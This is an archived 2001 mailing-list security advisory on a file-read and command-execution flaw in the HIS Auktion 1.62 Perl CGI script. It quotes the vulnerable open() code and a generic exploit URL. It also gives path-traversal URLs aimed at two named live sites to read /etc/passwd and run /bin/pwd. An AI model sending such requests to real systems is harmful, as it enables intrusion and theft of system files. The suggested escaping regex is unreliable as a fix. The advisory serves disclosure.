OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: UkR-XblP™ (cuctemaOK.RU)
Date: Mon Feb 12 2001 - 08:22:46 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----------UkR security team advisory #8------------
    HIS Auktion 1.62: "show files" vulnerability and remote
    command execute.
    --------------------------------------------------

    Name: HIS Auktion 1.62: "show files" vulnurability.
    Date: 11.02.2001
    Author: UkR-XblP
    About: script "HIS Auktion 1.62" is a catalog of links CGI
    script. The creators site http://www.his-software.de
    Problem:
    -------from auktion.pl-------
    sub readfile {
    local($filename)=$_0;
    local(array);
    open(f,$filename);
    ----------------------------
    $filename - is not filterred on symbols.

    Exploit: http://www.victim.com/cgi-bin/auktion.pl?menue=path/to/any/file/or/command
    FIX: to fix the bug yo need to add variable $filename check
    to the script. For example: $filename=~s/(\[\]\;\:\/\$\!\$\&\`\\\(\)\{\}\")/\\$1/g;
    Example:
    http://www.zimmerauktion.de/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../bin/pwd
    |
    http://www.chess-international.de/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd

    Get your free e-mail address at http://www.zmail.ru